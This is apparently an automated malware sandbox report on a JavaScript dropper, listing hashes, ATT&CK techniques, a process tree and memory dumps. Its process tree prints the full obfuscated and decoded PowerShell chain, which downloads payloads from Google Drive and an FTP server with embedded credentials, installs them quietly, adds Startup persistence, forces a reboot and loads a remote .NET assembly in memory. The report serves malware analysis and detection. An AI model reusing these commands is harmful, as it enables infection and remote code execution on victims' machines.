6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1

General

Target

6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js
Size

11KB
MD5

e1c347b8f89a739b8ac859399fc5dd2f
SHA1

5ca91197785030f2072ed083b456e544d39b5ce3
SHA256

6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1
SHA512

d259433ba8a8f61c3909243630b94ff1ae32ee833858375d350a08ef99f6bedb1434116de9bc56293ae7fbc60249eba21be871cb35ff50d73d684eec9a535b0a
SSDEEP

192:QuJSWVs9A/4AzIZgROnqoM2CIi3UooDGcCLcYa6iNrpaNfbc1NgNd+tchvtk7alH:7sUVzywNoMNI+oyHcY4hpaVc7gmtc9lH

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2756	powershell.exe
2684	powershell.exe
2100	powershell.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2756	powershell.exe
2684	powershell.exe
1220	powershell.exe
2100	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2756	powershell.exe
Token: SeDebugPrivilege	2684	powershell.exe
Token: SeDebugPrivilege	1220	powershell.exe
Token: SeDebugPrivilege	2100	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1892 wrote to memory of 2756	1892	wscript.exe	30
PID 1892 wrote to memory of 2756	1892	wscript.exe	30
PID 1892 wrote to memory of 2756	1892	wscript.exe	30
PID 2756 wrote to memory of 2684	2756	powershell.exe	32
PID 2756 wrote to memory of 2684	2756	powershell.exe	32
PID 2756 wrote to memory of 2684	2756	powershell.exe	32
PID 2684 wrote to memory of 1220	2684	powershell.exe	33
PID 2684 wrote to memory of 1220	2684	powershell.exe	33
PID 2684 wrote to memory of 1220	2684	powershell.exe	33
PID 1220 wrote to memory of 2624	1220	powershell.exe	34
PID 1220 wrote to memory of 2624	1220	powershell.exe	34
PID 1220 wrote to memory of 2624	1220	powershell.exe	34
PID 2684 wrote to memory of 2100	2684	powershell.exe	35
PID 2684 wrote to memory of 2100	2684	powershell.exe	35
PID 2684 wrote to memory of 2100	2684	powershell.exe	35

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1892
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $nbgdE = 'JA㍿lAEgASg㍿jAGsAIAA9ACAAJA㍿oAG8Acw㍿0AC4AVg㍿lAHIAcw㍿pAG8AbgAuAE0AYQ㍿qAG8AcgAuAEUAcQ㍿1AGEAbA㍿zACgAMgApADsASQ㍿mACAAKAAgACQAZQ㍿IAEoAYw㍿rACAAKQAgAHsAJA㍿NAGoATA㍿qAHAAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAEkATwAuAFAAYQ㍿0AGgAXQA6ADoARw㍿lAHQAVA㍿lAG0AcA㍿QAGEAdA㍿oACgAKQA7AGQAZQ㍿sACAAKAAkAE0Aag㍿MAGoAcAAgACsAIAAnAFwAVQ㍿wAHcAaQ㍿uAC4AbQ㍿zAHUAJwApADsAJA㍿zAGkAVg㍿wAFAAIAA9ACAAJw㍿oAHQAdA㍿wAHMAOgAvAC8AZA㍿yAGkAdg㍿lAC4AZw㍿vAG8AZw㍿sAGUALg㍿jAG8AbQAvAHUAYwA/AGUAeA㍿wAG8Acg㍿0AD0AZA㍿vAHcAbg㍿sAG8AYQ㍿kACYAaQ㍿kAD0AJwA7ACQAUQ㍿EAGYARw㍿vACAAPQAgACQAZQ㍿uAHYAOg㍿QAFIATw㍿DAEUAUw㍿TAE8AUg㍿fAEEAUg㍿DAEgASQ㍿UAEUAQw㍿UAFUAUg㍿FAC4AQw㍿vAG4AdA㍿hAGkAbg㍿zACgAJwA2ADQAJwApADsAaQ㍿mACAAKAAgACQAUQ㍿EAGYARw㍿vACAAKQAgAHsAJA㍿zAGkAVg㍿wAFAAIAA9ACAAKAAkAHMAaQ㍿WAHAAUAAgACsAIAAnAFcAMQAxADIAQQ㍿kAFAAZg㍿JADAAUA㍿DADcAaA㍿iAHMAYw㍿pAF8ANQ㍿fADAAXw㍿lAFUANw㍿OAHcATQ㍿aAGgAZgA0AHgAJwApACAAOw㍿9AGUAbA㍿zAGUAIA㍿7ACQAcw㍿pAFYAcA㍿QACAAPQAgACgAJA㍿zAGkAVg㍿wAFAAIAArACAAJwAxAGIAcg㍿qADUAag㍿xAG4AcQ㍿SAHgAQw㍿EADYAVg㍿oAGYAaA㍿㍿AG4AMg㍿yAGMAVg㍿mAHMAUg㍿vADcARAA4AGcAcgAnACkAIAA7AH0AOwAkAE4AeQ㍿CAFkAYwAgAD0AIAAoACAATg㍿lAHcALQ㍿PAGIAag㍿lAGMAdAAgAE4AZQ㍿0AC4AVw㍿lAGIAQw㍿sAGkAZQ㍿uAHQAIAApACAAOwAkAE4AeQ㍿CAFkAYwAuAEUAbg㍿jAG8AZA㍿pAG4AZwAgAD0AIA㍿bAFMAeQ㍿zAHQAZQ㍿tAC4AVA㍿lAHgAdAAuAEUAbg㍿jAG8AZA㍿pAG4AZw㍿dADoAOg㍿VAFQARgA4ACAAOwAkAE4AeQ㍿CAFkAYwAuAEQAbw㍿3AG4AbA㍿vAGEAZA㍿GAGkAbA㍿lACgAJA㍿VAFIATA㍿LAEIALAAgACQATQ㍿qAEwAag㍿wACAAKwAgACcAXA㍿VAHAAdw㍿pAG4ALg㍿tAHMAdQAnACkAIAA7ACQAQQ㍿VAHIARw㍿GACAAPQAgACgAIAAnAEMAOg㍿cAFUAcw㍿lAHIAcw㍿cACcAIAArACAAWw㍿FAG4Adg㍿pAHIAbw㍿uAG0AZQ㍿uAHQAXQA6ADoAVQ㍿zAGUAcg㍿OAGEAbQ㍿lACAAKQA7AEkAeg㍿qAEEAUQAgAD0AIAAoACAAJA㍿NAGoATA㍿qAHAAIAArACAAJw㍿cAFUAcA㍿3AGkAbgAuAG0Acw㍿1ACcAIAApACAAOwAgAHAAbw㍿3AGUAcg㍿zAGgAZQ㍿sAGwALg㍿lAHgAZQAgAHcAdQ㍿zAGEALg㍿lAHgAZQAgAEkAeg㍿qAEEAUQAgAC8AcQ㍿1AGkAZQ㍿0ACAALw㍿uAG8Acg㍿lAHMAdA㍿hAHIAdAAgADsAIA㍿DAG8AcA㍿5AC0ASQ㍿0AGUAbQAgACcAJQ㍿EAEMAUA㍿KAFUAJQAnACAALQ㍿EAGUAcw㍿0AGkAbg㍿hAHQAaQ㍿vAG4AIAAoACAAJA㍿㍿AFUAcg㍿HAEYAIAArACAAJw㍿cAEEAcA㍿wAEQAYQ㍿0AGEAXA㍿SAG8AYQ㍿tAGkAbg㍿nAFwATQ㍿pAGMAcg㍿vAHMAbw㍿mAHQAXA㍿XAGkAbg㍿kAG8Adw㍿zAFwAUw㍿0AGEAcg㍿0ACAATQ㍿lAG4AdQ㍿cAFAAcg㍿vAGcAcg㍿hAG0Acw㍿cAFMAdA㍿hAHIAdA㍿1AHAAJwAgACkAIAAtAGYAbw㍿yAGMAZQAgADsAcA㍿vAHcAZQ㍿yAHMAaA㍿lAGwAbAAuAGUAeA㍿lACAALQ㍿jAG8AbQ㍿tAGEAbg㍿kACAAJw㍿zAGwAZQ㍿lAHAAIAAxADgAMAAnADsAIA㍿zAGgAdQ㍿0AGQAbw㍿3AG4ALg㍿lAHgAZQAgAC8AcgAgAC8AdAAgADAAIAAvAGYAIA㍿9AGUAbA㍿zAGUAIA㍿7AFsAUw㍿5AHMAdA㍿lAG0ALg㍿OAGUAdAAuAFMAZQ㍿yAHYAaQ㍿jAGUAUA㍿vAGkAbg㍿0AE0AYQ㍿uAGEAZw㍿lAHIAXQA6ADoAUw㍿lAHIAdg㍿lAHIAQw㍿lAHIAdA㍿pAGYAaQ㍿jAGEAdA㍿lAFYAYQ㍿sAGkAZA㍿hAHQAaQ㍿vAG4AQw㍿hAGwAbA㍿iAGEAYw㍿rACAAPQAgAHsAJA㍿0AHIAdQ㍿lAH0AOw㍿bAFMAeQ㍿zAHQAZQ㍿tAC4ATg㍿lAHQALg㍿TAGUAcg㍿2AGkAYw㍿lAFAAbw㍿pAG4AdA㍿NAGEAbg㍿hAGcAZQ㍿yAF0AOgA6AFMAZQ㍿jAHUAcg㍿pAHQAeQ㍿QAHIAbw㍿0AG8AYw㍿vAGwAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAE4AZQ㍿0AC4AUw㍿lAGMAdQ㍿yAGkAdA㍿5AFAAcg㍿vAHQAbw㍿jAG8AbA㍿UAHkAcA㍿lAF0AOgA6AFQAbA㍿zADEAMgA7ACQAZg㍿nAEgAWQ㍿LACAAPQAgACgATg㍿lAHcALQ㍿PAGIAag㍿lAGMAdAAgAE4AZQ㍿0AC4AVw㍿lAGIAQw㍿sAGkAZQ㍿uAHQAKQA7ACQAZg㍿nAEgAWQ㍿LAC4ARQ㍿uAGMAbw㍿kAGkAbg㍿nACAAPQAgAFsAUw㍿5AHMAdA㍿lAG0ALg㍿UAGUAeA㍿0AC4ARQ㍿uAGMAbw㍿kAGkAbg㍿nAF0AOgA6AFUAVA㍿GADgAOwAkAGYAZw㍿IAFkASwAuAEMAcg㍿lAGQAZQ㍿uAHQAaQ㍿hAGwAcwAgAD0AIA㍿uAGUAdwAtAG8AYg㍿qAGUAYw㍿0ACAAUw㍿5AHMAdA㍿lAG0ALg㍿OAGUAdAAuAE4AZQ㍿0AHcAbw㍿yAGsAQw㍿yAGUAZA㍿lAG4AdA㍿pAGEAbAAoACcAZA㍿lAHMAYw㍿rAHYAYg㍿yAGEAdAAxACcALAAnAGQAZQ㍿2AGUAbA㍿vAHAAZQ㍿yAHAAcg㍿vADIAMQA1ADcAOA㍿KAHAAQA㍿AACcAKQA7ACQAeA㍿NAEEAbQ㍿KACAAPQAgACQAZg㍿nAEgAWQ㍿LAC4ARA㍿vAHcAbg㍿sAG8AYQ㍿kAFMAdA㍿yAGkAbg㍿nACgAIAAnAGYAdA㍿wADoALwAvAGQAZQ㍿zAGMAaw㍿2AGIAcg㍿hAHQAMQ㍿AAGYAdA㍿wAC4AZA㍿lAHMAYw㍿rAHYAYg㍿yAGEAdAAuAGMAbw㍿tAC4AYg㍿yAC8AVQ㍿wAGMAcg㍿5AHAAdA㍿lAHIALwAwADIALw㍿EAEwATAAwADEALg㍿0AHgAdAAnACAAKQA7ACQAZg㍿nAEgAWQ㍿LAC4AZA㍿pAHMAcA㍿vAHMAZQAoACkAOwAkAGYAZw㍿IAFkASwAgAD0AIAAoAE4AZQ㍿3AC0ATw㍿iAGoAZQ㍿jAHQAIA㍿OAGUAdAAuAFcAZQ㍿iAEMAbA㍿pAGUAbg㍿0ACkAOwAkAGYAZw㍿IAFkASwAuAEUAbg㍿jAG8AZA㍿pAG4AZwAgAD0AIA㍿bAFMAeQ㍿zAHQAZQ㍿tAC4AVA㍿lAHgAdAAuAEUAbg㍿jAG8AZA㍿pAG4AZw㍿dADoAOg㍿VAFQARgA4ADsAJA㍿4AE0AQQ㍿tAEoAIAA9ACAAJA㍿mAGcASA㍿ZAEsALg㍿EAG8Adw㍿uAGwAbw㍿hAGQAUw㍿0AHIAaQ㍿uAGcAKAAgACQAeA㍿NAEEAbQ㍿KACAAKQA7AFsAQg㍿5AHQAZQ㍿bAF0AXQAgACQAUg㍿YAGkAVg㍿qAF8AWQ㍿sAHQASA㍿LACAAPQAgAFsAUw㍿5AHMAdA㍿lAG0ALg㍿DAG8Abg㍿2AGUAcg㍿0AF0AOgA6AEYAcg㍿vAG0AQg㍿hAHMAZQA2ADQAUw㍿0AHIAaQ㍿uAGcAKAAgACQAeA㍿NAEEAbQ㍿KAC4AUg㍿lAHAAbA㍿hAGMAZQAoACAAJwCTIToAkyEnACAALAAgACcAQQAnACAAKQAgACkAOw㍿bAFMAeQ㍿zAHQAZQ㍿tAC4AQQ㍿wAHAARA㍿vAG0AYQ㍿pAG4AXQA6ADoAQw㍿1AHIAcg㍿lAG4AdA㍿EAG8AbQ㍿hAGkAbgAuAEwAbw㍿hAGQAKAAgACQAUg㍿YAGkAVg㍿qAF8AWQ㍿sAHQASA㍿LACAAKQAuAEcAZQ㍿0AFQAeQ㍿wAGUAKAAgACcAQw㍿sAGEAcw㍿zAEwAaQ㍿iAHIAYQ㍿yAHkAMwAuAEMAbA㍿hAHMAcwAxACcAIAApAC4ARw㍿lAHQATQ㍿lAHQAaA㍿vAGQAKAAgACcAcA㍿yAEYAVg㍿JACcAIAApAC4ASQ㍿uAHYAbw㍿rAGUAKAAkAG4AdQ㍿sAGwALAAgAFsAbw㍿iAGoAZQ㍿jAHQAWw㍿dAF0AIAAoACAAJwAwAC8AUA㍿XAE0ARQ㍿0AC8AZAAvAGUAZQAuAGUAdA㍿zAGEAcAAvAC8AOg㍿zAHAAdA㍿0AGgAJwAgACwAIAAnACUARA㍿DAFAASg㍿VACUAJwAsACAAJw㍿GAGEAbA㍿zAGUAJwAgACkAIAApADsAfQA7AA==';$nbgdE = $nbgdE.replace('㍿','B') ;$nbgdE = [System.Convert]::FromBase64String( $nbgdE ) ;;;$nbgdE = [System.Text.Encoding]::Unicode.GetString( $nbgdE ) ;$nbgdE = $nbgdE.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js') ;powershell $nbgdE
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2756
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$eHJck = $host.Version.Major.Equals(2);If ( $eHJck ) {$MjLjp = [System.IO.Path]::GetTempPath();del ($MjLjp + '\Upwin.msu');$siVpP = 'https://drive.google.com/uc?export=download&id=';$QDfGo = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $QDfGo ) {$siVpP = ($siVpP + 'W112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$siVpP = ($siVpP + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$NyBYc = ( New-Object Net.WebClient ) ;$NyBYc.Encoding = [System.Text.Encoding]::UTF8 ;$NyBYc.DownloadFile($URLKB, $MjLjp + '\Upwin.msu') ;$AUrGF = ( 'C:\Users\' + [Environment]::UserName );IzjAQ = ( $MjLjp + '\Upwin.msu' ) ; powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$fgHYK = (New-Object Net.WebClient);$fgHYK.Encoding = [System.Text.Encoding]::UTF8;$fgHYK.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$xMAmJ = $fgHYK.DownloadString( 'ftp://[email protected]/Upcrypter/02/DLL01.txt' );$fgHYK.dispose();$fgHYK = (New-Object Net.WebClient);$fgHYK.Encoding = [System.Text.Encoding]::UTF8;$xMAmJ = $fgHYK.DownloadString( $xMAmJ );[Byte[]] $RXiVj_YltHK = [System.Convert]::FromBase64String( $xMAmJ.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $RXiVj_YltHK ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( '0/PWMEt/d/ee.etsap//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js', 'False' ) );};"
    3⤵
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2684
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe IzjAQ /quiet /norestart
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1220
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" IzjAQ /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:2624
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2100

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
8e2c1d4215361772b2a91a1b479545f6

SHA1
ab989847f46eaca91e2c3d28cde6f5fa8dcd7216

SHA256
94c5bc8a7f1c53cd1d681aa790263f74a401ebfbc6dd522c05cee68085e10751

SHA512
b9c4ad9b282263eb3b9e12aab369c76db87d63f56c2b09695809b0dfc9ce4fb1b8a22575fc061f7505f3b913e8459ad555d60525ca4f934f238f7212300e37c7

Download Submit
memory/2756-4-0x000007FEF537E000-0x000007FEF537F000-memory.dmp

Filesize
4KB

Download
memory/2756-5-0x000000001B720000-0x000000001BA02000-memory.dmp

Filesize
2.9MB

Download
memory/2756-6-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/2756-12-0x000007FEF50C0000-0x000007FEF5A5D000-memory.dmp

Filesize
9.6MB

Download
memory/2756-13-0x000007FEF50C0000-0x000007FEF5A5D000-memory.dmp

Filesize
9.6MB

Download
memory/2756-26-0x000007FEF50C0000-0x000007FEF5A5D000-memory.dmp

Filesize
9.6MB

Download
memory/2756-27-0x000007FEF537E000-0x000007FEF537F000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing